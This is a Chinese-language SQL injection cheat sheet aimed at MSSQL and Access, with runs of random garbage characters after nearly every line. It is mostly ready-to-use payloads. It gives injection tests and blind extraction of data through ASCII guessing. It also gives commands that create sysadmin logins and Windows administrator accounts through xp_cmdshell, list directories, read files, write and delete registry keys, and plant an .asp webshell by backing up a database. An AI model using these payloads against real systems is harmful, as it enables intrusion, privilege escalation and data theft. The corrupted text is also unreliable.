1.判断是否有注入;and 1=1 ;and 1=2 ?onTW2c�G;
2.初步判断是否是mssql ;and user>0 i)�pAFv<$,
o2�C{V1nB
3.注入参数是字符'and [查询条件] and ''=' sAG#M\A6��
9�n�rH
6]
4.搜索时没过滤参数的'and [查询条件] and '%25'=' LyB &u�(�)
AQ�H��\ ;L
5.判断数据库系统 97%S{_2m�/
dq&�N;kk
|
;and (select count(*) from sysobjects)>0 mssql ^�t'mfG|DV
�o�g���rh"
;and (select count(*) from msysobjects)>0 access Pf��Re)JuB
b�m+�
#�OI
�E0Y>2HOuL
O*8�.kqlgt
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `Z���3p( G
�A�*r���6�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &�2Ei�mP��
k1��5�B�5�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ;���n�)�9
���d/fg�
9.(1)猜字段的ascii值(access) �n\ yDMY
Vk>m/����"
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �X�DW��R�]
f�i�6i{�(K
(2)猜字段的ascii值(mssql) [Pnk@�jIk4
uFzvb0O`O
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �?Thh7#7LM
�L��R5X=&k
10.测试权限结构(mssql) ~$�O.KF��:
#:y�h2y7a%
�v7Sh�XX:�
OcBK�n�=�8
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- t[� Z�oe+&
{�|�;5P.,l
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ,W!v0*uxp&
>�*hY�1@N1
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- d0Jaa1b�~O
SGuLL+|W#8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- � *�C�(/�2
cM= ?�{W7~
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- |N�srO8H
�
|@a�.dgz,�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /�i${���[1
;E�"�T��OC
;and 1=(select IS_MEMBER('db_owner'));-- to�cZO�
?'@tx4#v\2
�d�1"�%sI
VK��jDK��$
11.添加mssql和系统的帐户 }��5����2]
V@QWJZ"���
;exec master.dbo.sp_addlogin username;-- L1�'��#wH
;exec master.dbo.sp_password null,username,password;-- ^+hq�Gu]M
U=<d�;2N�#
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- X~`<�ik{q
*�Z+8L*k97
;exec master.dbo.xp_cmdshell 'net user username password ��jI���-\~
]Ywj@�-*�q
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- SP,#KyWP0)
UY�)e6 Zd
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �`pH�lGbrW
n�Mn�iH�B'
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �u��EK���9
�eq�|�G\XJ
}3"FQ/6C�
>8pmClVvmR
12.(1)遍历目录 $<y10Df��O
�zPC&p�{S>
;create table dirs(paths varchar(100), id int) ranLH�m.nB
VeJM=s.y7
;insert dirs exec master.dbo.xp_dirtree 'c:\' w��}OJ�2^�
~(B�vI�zzD
;and (select top 1 paths from dirs)>0 Kn
WjP�21
!yo/ F&�6�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) L7_q�s+��
qM.�"W=XVN
�_x.<Zc\�x
:|GC~JElo5
(2)遍历目录 �W'
DpI�7�
C
�Rd�1zDB
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- J^D�kx"1GD
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 y?t2@f]!XK
*$t<H-U�-
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 N^G:m���~>
$6(,/}=�=0
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 v-V#�?+�#�
tP?pN]�Q$,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 t�3~Z�GO�n
bD&�^-&
�G
|�Ew~3�-u!
^*
��xhbM;
13.mssql中的存储过程 I$#B#w?!$r
0�X`sQ�N�x
xp_regenumvalues 注册表根键, 子键 }\9el�Vt'2
"k�E�$�2Kg
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��3Ishe�"�
+}X�FkH�~
xp_regread 根键,子键,键值名 Ddf7�ws�zW
[a\��U8
w
;exec xp_regread .�=j]PckJO
:�V��(+]<�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 7�rc����6�
4QK~q�A��i
xp_regwrite 根键,子键, 值名, 值类型, 值 986y\9�Z�u
"Y�9PS_u(~
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��}`��O_��
cG�evFl�nh
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ou��r$Ka31
~f.fg@v`+v
xp_regdeletevalue 根键,子键,值名 B1E��I'<S�
D�rG�9Kky{
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 R�mq8lU���
�q�`�l&G%
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 $R\�D[`y|�
ileqI/4�0f
;�"*\R5��a
b'D|p/)m0S
14.mssql的backup创建webshell &a'�H vQ�V
(&2��5 8i,
use model {^r8uKo:~�
q8��j�
W&_
create table cmd(str image); �FC'�v=� *
-,M*j|����
insert into cmd(str) values (''); M^�i^_}~S;
;1S�~'B&1Q
backup database model to disk='c:\l.asp'; Mr5E\~�K>s
@~4Q�\^;NX
�e?P�zhh�a
5� A/[x�$q
15.mssql内置函数 ,�r�v�w E
S%h[e[[fST
;and (select @@version)>0 获得Windows的版本号 ���!>~W5c^
O�rb('Z,-3
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �2D5S%�27,
9���W�XJz;
;and (select user_name())>0 爆当前系统的连接用户 C q/936�`O
Q7 dX�TS4H
;and (select db_name())>0 得到当前连接的数据库 �[�k"@�n+%
I�g9g�GI,�
S�Dd��ef�B
�*�r�Y@(|�
16.简洁的webshell �~1x�,m.f8
�`/zx�2Tkk
use model 6`KA�l rH�
k`Lo�R��qF
create table cmd(str image); W�?a{3B� �
j@JhxCe1+R
insert into cmd(str) values (''); uR�|?��5DK
6�Un��6�1s
backup database model to disk='g:\wwwtest\l.asp';
